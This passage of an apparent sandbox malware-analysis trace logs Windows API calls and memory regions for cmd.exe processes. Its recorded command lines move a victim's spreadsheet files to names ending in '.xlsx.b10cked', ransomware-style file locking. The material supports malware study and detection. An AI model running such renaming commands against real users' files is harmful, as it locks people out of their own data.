lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\BUW1GW~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x81ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81ae0) returned 0x70ef8 [0130.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x26ee64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked", lpFilePart=0x0) returned 0x30 [0130.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx", nBufferLength=0x104, lpBuffer=0x26ee64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx", lpFilePart=0x0) returned 0x28 [0130.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx")) returned 0x20 [0130.833] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\bUW1gWS4k.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\buw1gws4k.xlsx.b10cked"), dwFlags=0x3) returned 1 [0130.833] FindClose (in: hFindFile=0x70ef8 | out: hFindFile=0x70ef8) returned 1 [0130.833] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ee18 | out: _Buffer=" 1") returned 9 [0130.833] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.833] GetFileType (hFile=0x7) returned 0x2 [0130.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0130.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eda4 | out: lpMode=0x26eda4) returned 1 [0130.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26edd8 | out: lpConsoleScreenBufferInfo=0x26edd8) returned 1 [0130.834] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0130.834] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ee18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0130.834] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26edfc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26edfc*=0x1a) returned 1 [0130.834] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.834] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.835] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.835] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.835] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.835] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.835] SetConsoleInputExeNameW () returned 0x1 [0130.835] GetConsoleOutputCP () returned 0x1b5 [0130.835] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.835] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.835] exit (_Code=0) Process: id = "99" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0x248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11568 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11569 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11570 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11571 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 11572 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11573 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11574 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11575 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11576 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 11577 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11598 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11599 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11600 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11601 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 11602 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 11603 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11604 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11605 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11606 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11607 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11608 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11609 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11610 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11611 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11612 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 11613 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11614 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11615 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 11616 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 11617 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 11618 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 11619 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 11620 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 11621 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 156 os_tid = 0x42c [0130.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f964 | out: lpSystemTimeAsFileTime=0x16f964*(dwLowDateTime=0x87c089a0, dwHighDateTime=0x1d440a9)) [0130.555] GetCurrentProcessId () returned 0x248 [0130.555] GetCurrentThreadId () returned 0x42c [0130.555] GetTickCount () returned 0x29ae7 [0130.555] QueryPerformanceCounter (in: lpPerformanceCount=0x16f95c | out: lpPerformanceCount=0x16f95c*=18734473095) returned 1 [0130.556] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0130.556] __set_app_type (_Type=0x1) [0130.556] __p__fmode () returned 0x76b331f4 [0130.556] __p__commode () returned 0x76b331fc [0130.556] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0130.557] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0130.557] GetCurrentThreadId () returned 0x42c [0130.557] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0130.557] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.557] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.557] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8f4 | out: phkResult=0x16f8f4*=0x0) returned 0x2 [0130.557] VirtualQuery (in: lpAddress=0x16f92b, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.558] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.558] GetConsoleOutputCP () returned 0x1b5 [0130.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.558] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.559] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.559] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.559] GetEnvironmentStringsW () returned 0x3101b0* [0130.559] FreeEnvironmentStringsW (penv=0x3101b0) returned 1 [0130.559] GetEnvironmentStringsW () returned 0x3101b0* [0130.559] FreeEnvironmentStringsW (penv=0x3101b0) returned 1 [0130.559] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e864 | out: phkResult=0x16e864*=0x40) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0xe8, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x0, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegCloseKey (hKey=0x40) returned 0x0 [0130.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e864 | out: phkResult=0x16e864*=0x40) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x0, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegCloseKey (hKey=0x40) returned 0x0 [0130.560] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.560] srand (_Seed=0x5b886365) [0130.560] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" [0130.561] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" [0130.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.561] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.561] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.561] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.561] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.561] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.561] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.562] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.562] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.562] GetEnvironmentStringsW () returned 0x312300* [0130.562] FreeEnvironmentStringsW (penv=0x312300) returned 1 [0130.562] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.562] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.562] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.562] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.562] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.562] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.562] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.562] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f630 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.562] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f630, lpFilePart=0x16f62c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f62c*="Desktop") returned 0x18 [0130.562] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.562] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.563] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.563] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.563] GetEnvironmentStringsW () returned 0x312b20* [0130.564] FreeEnvironmentStringsW (penv=0x312b20) returned 1 [0130.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.564] GetConsoleOutputCP () returned 0x1b5 [0130.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.564] GetUserDefaultLCID () returned 0x409 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f770, cchData=128 | out: lpLCData="0") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f770, cchData=128 | out: lpLCData="0") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f770, cchData=128 | out: lpLCData="1") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.565] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.566] GetConsoleTitleW (in: lpConsoleTitle=0x300900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.566] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.566] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.566] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.567] _wcsicmp (_String1="move", _String2=")") returned 68 [0130.567] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0130.567] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0130.567] _wcsicmp (_String1="IF", _String2="move") returned -4 [0130.567] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0130.567] _wcsicmp (_String1="REM", _String2="move") returned 5 [0130.567] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0130.571] GetConsoleTitleW (in: lpConsoleTitle=0x16f468, nSize=0x104 | out: 